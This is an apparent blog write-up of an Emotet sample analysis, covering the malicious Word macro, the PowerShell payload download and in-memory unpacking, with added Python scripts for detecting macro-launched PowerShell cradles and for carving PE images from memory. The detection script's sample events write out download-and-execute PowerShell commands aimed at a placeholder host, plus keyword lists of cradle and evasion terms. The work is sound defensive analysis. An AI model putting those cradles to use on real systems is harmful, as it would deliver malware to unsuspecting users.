I recently finished reading the book Practical Malware Analysis. The book provides some great sample exercises to work through, but I wanted to try a real-world malware sample next. So I decided to take on one of the malware families most active at the time of writing this article, Emotet.

Delivery

After some initial research I learned that the malware is usually distributed via email phishing. This sample, however, was downloaded from a compromised Nepalese website, another preferred delivery method. You can visit https://urlhaus.abuse.ch/browse/tag/emotet/ for other sites that are used to deliver the malware. The site served a Microsoft Word document.

Sites compromised for emotet delivery

Initial Static and Dynamic Analysis

Since it was a Word document, I guessed it would use macros to execute commands. I used the Python olevba.py tool (part of oletools) to check whether it contained any macros, and indeed it did. The following is a sample of the output:

Function YTHiNRwPXuc()

Const sUwiRoCWWnD = 887149054-887149054

Dim GsjiwB, CZXRTwT, CbMFvawK, IhLVB

CZXRTwT = Len(zVAznGfV)

IhLVB = ""

For GsjiwB = 1 To CZXRTwT

IhLVB = IhLVB & (15 + ((CbMFvawK + 33) Mod 124))

----- OUTPUT OMITTED -----

The code looked obfuscated, and the tool itself confirmed my suspicion.

Olevba.py output

We can see that there are many hex- or base64-encoded strings. Also, the macro runs automatically as soon as the Word document is opened. To run dynamic analysis on the macro code, I used the Python ViperMonkey (vmonkey) tool. It showed that the macro uses Shell to execute commands.

Shell execution

I suspected that the shell command would download an additional payload, so I opened the Word document with macros enabled and observed the network traffic with Fiddler. The macro executes a PowerShell command to download the payload.

PowerShell script execution
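The Office-process-spawns-PowerShell-that-downloads-an-executable chain seen above is also the detection opportunity. The following script is an added example (not code from the original post and not part of the malware) that triages process-creation events for exactly that pattern: it decodes a `-EncodedCommand` payload (base64 of UTF-16LE text), flags an Office parent launching a script host, and pulls download-cradle keywords, URLs and dropped `.exe` names out of the effective command line. The event format, the sample events and the `http://example.invalid/QWC.exe` URL are constructed for the example; the keyword lists are an assumption about what a first-pass rule should look for, not a complete signature.

```python
"""Triage process-creation events for macro-launched PowerShell download cradles."""
import base64
import binascii
import re

# Constructed for this example: one Sysmon-style event per line (ParentImage, Image, CommandLine).
LOG_RE = re.compile(r"^ParentImage=(?P<parent>\S+)\s+Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$")
# PowerShell accepts these abbreviations of -EncodedCommand; the value is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.I)
EXE_RE = re.compile(r"\b([\w-]+\.exe)\b", re.I)

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed keyword lists (lower-case); a real rule set would be broader.
CRADLE_KEYWORDS = ("downloadfile", "downloadstring", "webclient", "invoke-webrequest",
                   "invoke-expression", "iex ", "start-process", "bitstransfer")
EVASION_KEYWORDS = ("-nop", "-w hidden", "-windowstyle hidden", "-noninteractive", "bypass")


def encode_powershell(command):
    """Produce the value PowerShell expects after -EncodedCommand (used to build the sample event)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(line):
    """Score one event; returns the decoded command plus the indicators that fired."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("unrecognised event format: " + line)
    parent, image, cmd = m.group("parent"), m.group("image"), m.group("cmd")
    decoded = decode_encoded_command(cmd)
    indicators = []
    if basename(parent) in OFFICE_PARENTS and basename(image) in SCRIPT_HOSTS:
        indicators.append("office-parent")
    if ENC_RE.search(cmd):
        indicators.append("encoded-command" if decoded is not None else "encoded-command-undecodable")
    # Search the outer command line and the decoded payload together: flags such as
    # -w hidden live outside the base64 blob, the cradle itself lives inside it.
    haystack = (cmd + " " + (decoded or "")).lower()
    cradle = [k.strip() for k in CRADLE_KEYWORDS if k in haystack]
    evasion = [k for k in EVASION_KEYWORDS if k in haystack]
    indicators += cradle + evasion
    return {
        "parent": parent, "image": image, "decoded": decoded, "indicators": indicators,
        "urls": URL_RE.findall(haystack),
        "dropped": sorted({e.lower() for e in EXE_RE.findall(haystack)}),
        # A download cradle launched by an Office process, or hidden inside -EncodedCommand,
        # is the macro-dropper pattern described in the post.
        "suspicious": bool(cradle) and ("office-parent" in indicators or "encoded-command" in indicators),
    }


# Constructed sample cradle and events; the host and file names are placeholders, not real IOCs.
CRADLE = ("(New-Object Net.WebClient).DownloadFile('http://example.invalid/QWC.exe', "
          "$env:TEMP + '\\QWC.exe'); Start-Process ($env:TEMP + '\\QWC.exe')")
SAMPLE_EVENTS = [
    "ParentImage=C:\\Office16\\WINWORD.EXE Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -nop -w hidden -enc " + encode_powershell(CRADLE),
    "ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -Command Get-ChildItem C:\\Users",
    "ParentImage=C:\\Office16\\WINWORD.EXE Image=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd /c powershell -enc NotBase64!!",
    "ParentImage=C:\\Office16\\EXCEL.EXE Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')\"",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = triage(event)
        print(result["suspicious"], result["indicators"], result["urls"], result["dropped"])
```

The undecodable case is kept as its own indicator on purpose: a truncated or mangled `-enc` blob in a log is itself worth a look, and silently treating it as a plain command line would hide the fact that something tried to use encoding.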

I monitored the hard disk for newly written files using FolderChangesView, and found that the macro downloaded a file named QWC.exe.

New payload downloaded

I analysed the downloaded sample with CFF Explorer and did not find much of interest. The file did, however, have imports, and its version information claimed that Microsoft held the legal copyright. LOL.

CFF Explorer

Code Reversing and Debugging

I loaded the malware in IDA and found that it imported APIs such as GetCommandLineA() ... While running the code, however, I noticed that the malware uses some anti-reverse-engineering tricks. Some code was actually treated as data and fooled the disassembler until it was executed.

Anti Reverse Engineering

After some debugging I observed that the malware allocates memory and loads an actual PE image into that memory.
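When a sample unpacks a second PE into memory like this, the usual next step is to dump the region and carve the image out of it. The script below is an added example (not the post's code and not taken from the sample) that walks a byte buffer for `MZ` headers, validates the `e_lfanew`/`PE\0\0` chain, the optional-header magic and the section table before accepting a hit, and carves the image out. It also shows the other half of the problem: an image that was loaded rather than written to disk has its sections at their virtual addresses, so `carve(..., mapped=True)` rewrites `PointerToRawData`/`SizeOfRawData` to the virtual layout so the dump parses as a file again. The PE built by `build_sample_image()` and the decoy `MZ` in the test buffer are constructed for the example.

```python
"""Find, carve and un-map PE images embedded in a byte buffer (e.g. a dumped memory region)."""
import struct

PE32, PE32PLUS = 0x10B, 0x20B
SECTION_SIZE = 40  # IMAGE_SECTION_HEADER


def parse_pe_at(buf, mz):
    """Parse a PE whose 'MZ' lies at buf[mz]; return a dict describing it, or None if malformed."""
    if len(buf) < mz + 0x40 or buf[mz:mz + 2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", buf, mz + 0x3C)
    nt = mz + e_lfanew
    if e_lfanew > 0x1000 or nt + 24 > len(buf) or buf[nt:nt + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, nt + 4)
    opt = nt + 24
    if not (1 <= nsec <= 96) or opt_size < 64 or opt + opt_size > len(buf):
        return None
    (magic,) = struct.unpack_from("<H", buf, opt)
    if magic not in (PE32, PE32PLUS):
        return None
    (entry,) = struct.unpack_from("<I", buf, opt + 16)
    # ImageBase is a DWORD at +28 in PE32 but a QWORD at +24 in PE32+ (no BaseOfData field).
    image_base = (struct.unpack_from("<I", buf, opt + 28)[0] if magic == PE32
                  else struct.unpack_from("<Q", buf, opt + 24)[0])
    (size_of_image,) = struct.unpack_from("<I", buf, opt + 56)
    sec_tab = opt + opt_size
    if sec_tab + nsec * SECTION_SIZE > len(buf):
        return None
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", buf, sec_tab + i * SECTION_SIZE)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr})
    # On-disk extent: the larger of the header block and the last section's raw data.
    end_rel = max(sec_tab + nsec * SECTION_SIZE - mz, *(s["rawptr"] + s["rawsize"] for s in sections))
    return {"offset": mz, "machine": machine, "type": "PE32+" if magic == PE32PLUS else "PE32",
            "entry": entry, "image_base": image_base, "size_of_image": size_of_image,
            "sec_table": sec_tab - mz, "sections": sections, "file_size": min(end_rel, len(buf) - mz)}


def find_pe_images(buf):
    """Return every well-formed PE found in buf, skipping 'MZ' bytes that do not lead to a PE header."""
    found, pos = [], 0
    while True:
        pos = buf.find(b"MZ", pos)
        if pos < 0:
            return found
        pe = parse_pe_at(buf, pos)
        if pe is None:
            pos += 1
        else:
            found.append(pe)
            pos += pe["file_size"]


def carve(buf, pe, mapped=False):
    """Extract the image. With mapped=True the region is a loaded image (sections at their
    VirtualAddress), so take SizeOfImage bytes and point each section's raw offset/size at
    its virtual offset/size so that file tools read the dump correctly."""
    off = pe["offset"]
    img = bytearray(buf[off:off + (pe["size_of_image"] if mapped else pe["file_size"])])
    if mapped:
        for i, s in enumerate(pe["sections"]):
            hdr = pe["sec_table"] + i * SECTION_SIZE
            struct.pack_into("<II", img, hdr + 16, s["vsize"], s["vaddr"])  # SizeOfRawData, PointerToRawData
    return bytes(img)


def map_image(disk):
    """Lay a disk-format PE out the way a loader (or an in-memory unpacker) does:
    headers at 0, each section copied to its VirtualAddress."""
    pe = parse_pe_at(disk, 0)
    mem = bytearray(pe["size_of_image"])
    hdr_end = pe["sec_table"] + len(pe["sections"]) * SECTION_SIZE
    mem[:hdr_end] = disk[:hdr_end]
    for s in pe["sections"]:
        mem[s["vaddr"]:s["vaddr"] + s["rawsize"]] = disk[s["rawptr"]:s["rawptr"] + s["rawsize"]]
    return bytes(mem)


def build_sample_image():
    """Construct a minimal, well-formed 32-bit PE with two sections (constructed test data)."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)  # i386, 2 sections, PE32 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32)
    struct.pack_into("<I", opt, 16, 0x1000)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<I", opt, 56, 0x3000)                        # SizeOfImage
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, 0x60000020)
                    for n, vs, va, rs, rp in ((b".text", 0x100, 0x1000, 0x200, 0x200),
                                              (b".data", 0x50, 0x2000, 0x200, 0x400)))
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs).ljust(0x200, b"\0")
    return headers + b"\xCC" * 0x200 + b"\xDD" * 0x200


if __name__ == "__main__":
    region = b"\x90" * 16 + b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x7FFFFFFF) + build_sample_image()
    for pe in find_pe_images(region):
        print(pe["type"], hex(pe["offset"]), [s["name"] for s in pe["sections"]])
```

The `mapped=True` fix-up is the same trick debugger dump plugins apply: it does not rebuild the import table, so a dumped Emotet stage still needs its imports repaired (and its entry point checked) before it will run, but it is enough for IDA or CFF Explorer to parse the carved file.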